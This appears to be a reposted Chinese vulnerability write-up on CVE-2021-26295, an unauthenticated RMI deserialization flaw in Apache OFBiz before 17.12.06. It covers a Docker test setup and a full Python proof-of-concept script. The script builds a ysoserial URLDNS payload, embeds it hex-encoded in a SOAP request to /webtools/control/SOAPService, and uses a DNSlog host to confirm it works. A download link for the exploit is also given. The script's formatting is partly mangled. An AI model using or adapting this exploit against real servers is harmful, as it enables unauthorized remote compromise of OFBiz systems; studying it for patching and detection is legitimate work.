Apache OFBiz RMI反序列化漏洞 CVE-2021-26295

  • A+
所属分类:安全漏洞

Apache OFBiz RMI反序列化漏洞 CVE-2021-26295



:漏洞描述🐑


OFBiz是基于Java的Web框架,包括实体引擎,服务引擎和基于小部件的UI。

近日,Apache OFBiz官方发布安全更新。Apache OFBiz 存在RMI反序列化前台命令执行,未经身份验证的攻击者可以使用此漏洞来成功接管Apache OFBiz,建议相关用户尽快测试漏洞修复的版本并及时升级。


二:  漏洞影响🐇


Apache OFBiz < 17.12.06




三:  漏洞复现🐋


Docker安装环境

docker run -d -p 8000:8080 -p 8443:8443  opensourceknight/ofbiz

Apache OFBiz RMI反序列化漏洞 CVE-2021-26295


使用POC验证Dnslog响应

Apache OFBiz RMI反序列化漏洞 CVE-2021-26295



 四:  漏洞POC🦉


下载地址 http://peiqi.tech/shentou/CVE-2021-26295.zipPOC参考了网上公开的几位师傅的脚本

import requestsimport sysimport sysimport subprocessimport binasciifrom requests.packages.urllib3.exceptions import InsecureRequestWarning
def title(): print('+------------------------------------------') print('+ 33[34mPOC_Des: http://wiki.peiqi.tech 33[0m') print('+ 33[34mGithub : https://github.com/PeiQi0 33[0m') print('+ 33[34m公众号 : PeiQi文库 33[0m') print('+ 33[34mVersion: Apache OFBiz 33[0m') print('+ 33[36m使用格式: python3 poc.py 33[0m') print('+ 33[36mUrl >>> http://xxx.xxx.xxx.xxx 33[0m') print('+ 33[36mDnslog >>> http://xxx.xxx.xxx.xxx 33[0m') print('+------------------------------------------')
def trans(s): return "%s" % ''.join('%.2x' % x for x in s)
def POC_1(target_url, Dnslog): popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', "URLDNS", Dnslog], stdout=subprocess.PIPE) data = popen.stdout.read() hex_data = trans(data) headers = { 'Content-Type': 'text/xml' } post_data = '''<?xml version='1.0' encoding='UTF-8'?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><peiqi:clearAllEntityCaches xmlns:peiqi="http://ofbiz.apache.org/service/"><peiqi:cus-obj>%s</peiqi:cus-obj></peiqi:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>''' % hex_data vuln_url = target_url + "/webtools/control/SOAPService" try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) response = requests.post(url=vuln_url, data=post_data, headers=headers, verify=False, timeout=5) print("33[36m[o] 正在请求 {}/webtools/control/SOAPService..... 33[0m".format(target_url)) if response.status_code == 200: print("33[36m[o] 请检查 Dnslog 响应n 33[0m") else: print("33[31m[x] 请求失败 33[0m") sys.exit(0)
except Exception as e: print("33[31m[x] 请求失败 33[0m")

if __name__ == '__main__': title() target_url = str(input("33[35mPlease input Attack UrlnUrl >>> 33[0m")) Dnslog = str(input("33[35mDnslog >>> 33[0m")) POC_1(target_url, Dnslog)



 五:  关于文库🦉



在线文库:

http://wiki.peiqi.tech


Github:

https://github.com/PeiQi0/PeiQi-WIKI-POC


最后

下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号

想要加入交流群的师傅公众号点击交流群加我拉你啦~

别忘了Github下载完给个小星星⭐


文库接收文库中未收录的漏洞投稿啦,一起建设文库啦~


本文始发于微信公众号(PeiQi文库):Apache OFBiz RMI反序列化漏洞 CVE-2021-26295

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: